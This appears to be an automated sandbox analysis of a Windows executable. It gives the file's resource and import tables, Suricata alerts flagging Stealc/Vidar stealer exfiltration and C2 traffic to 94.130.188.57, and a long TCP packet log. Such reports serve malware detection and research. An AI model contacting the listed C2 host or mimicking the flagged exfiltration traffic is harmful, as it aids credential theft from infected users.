                                                                                                                                                                                                                                                                                                  RT_ICON0x13dfac0x62c6PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0006327612117378
                                                                                                                                                                                                                                                                                                  RT_ICON0x1442740x213cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0012929007992477
                                                                                                                                                                                                                                                                                                  RT_ICON0x1463b00x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.504780309194467
                                                                                                                                                                                                                                                                                                  RT_ICON0x148a180x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5548724954462659
                                                                                                                                                                                                                                                                                                  RT_ICON0x149b400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6391843971631206
                                                                                                                                                                                                                                                                                                  RT_DIALOG0x149fa80x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                                  RT_DIALOG0x14a0a80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                                  RT_DIALOG0x14a1c40x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x14a2240x5adataEnglishUnited States0.7888888888888889
                                                                                                                                                                                                                                                                                                  RT_MANIFEST0x14a2800x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                  2024-12-23T06:23:45.287338+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.54975494.130.188.57443TCP
                                                                                                                                                                                                                                                                                                  2024-12-23T06:23:49.871078+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config194.130.188.57443192.168.2.549767TCP
                                                                                                                                                                                                                                                                                                  2024-12-23T06:23:52.172957+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.54977294.130.188.57443TCP
                                                                                                                                                                                                                                                                                                  2024-12-23T06:23:52.173133+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1194.130.188.57443192.168.2.549772TCP

                                                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:05.055843115 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:05.071432114 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:05.165227890 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:14.665142059 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:14.680763006 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:14.774516106 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:17.168955088 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:17.169063091 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.373948097 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.373979092 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.374093056 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.391814947 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.391827106 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:39.774455070 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:39.774523020 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:39.820626020 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:39.820652008 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:39.820943117 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:39.823796988 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:39.849497080 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:39.891331911 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.329869986 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.329895973 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.329936028 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.329962969 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.329998970 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.330056906 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.333323002 CET49739443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.333337069 CET44349739149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.482501984 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.482539892 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.482609034 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.483088970 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.483100891 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.298224926 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.298362017 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.301950932 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.301961899 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.302203894 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.302263975 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.302603960 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.347321987 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.972215891 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.972269058 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.972393990 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.972393990 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.975445032 CET49745443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.975460052 CET4434974594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.977324963 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.977370977 CET4434975494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.977444887 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.977744102 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:42.977756023 CET4434975494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:44.379878044 CET4434975494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:44.380098104 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:44.380646944 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:44.380672932 CET4434975494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:44.382432938 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:44.382441998 CET4434975494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.287369967 CET4434975494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.287451029 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.287453890 CET4434975494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.287662983 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.287731886 CET49754443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.287754059 CET4434975494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.289187908 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.289223909 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.289319038 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.289510965 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:45.289541006 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:46.691490889 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:46.691653967 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:46.692123890 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:46.692136049 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:46.693767071 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:46.693782091 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.583901882 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.583920956 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.583971024 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.584072113 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.584125996 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.584470987 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.584501028 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586199045 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586250067 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586369038 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586622953 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586644888 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.989240885 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.989320040 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.989834070 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.989842892 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.991714954 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.991719961 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.870888948 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.870908976 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.870969057 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.870969057 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.871026039 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.871068001 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.871501923 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.871557951 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873380899 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873399973 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873493910 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873713017 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873722076 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.273746967 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.273972034 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.274935961 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.274943113 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.277575970 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.277580023 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.172955990 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173015118 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173022032 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173078060 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173213005 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173228979 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189524889 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189575911 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189644098 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189810991 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189821959 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187117100 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187180996 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187306881 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187594891 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187611103 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.603087902 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.603375912 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.604552984 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.604566097 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.606513023 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.606518984 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.606616974 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.606637955 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.571973085 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.572043896 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.572057962 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.572098017 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.575576067 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.575592041 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.587883949 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.588006020 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.588896036 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.588900089 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.591789961 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.591794968 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630387068 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630453110 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630465031 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630490065 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630536079 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630536079 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.691054106 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.691068888 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.929589987 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.929629087 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.929714918 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.929918051 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.929935932 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.213263988 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.213279009 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.213418961 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.213824034 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.213926077 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.213994980 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.214627981 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.214638948 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.214973927 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.215010881 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.390986919 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.391031027 CET44349796142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.391103029 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.392203093 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:56.392219067 CET44349796142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.625221968 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.625631094 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.625657082 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.626545906 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.626632929 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.630496979 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.630569935 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.630738020 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.671164989 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.671180964 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.717794895 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.908205032 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.908461094 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.931622028 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.931631088 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.932715893 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.932763100 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.933763981 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.933839083 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.935564041 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.935585976 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.935694933 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.935750961 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.940738916 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.940911055 CET49793443192.168.2.5142.250.181.132
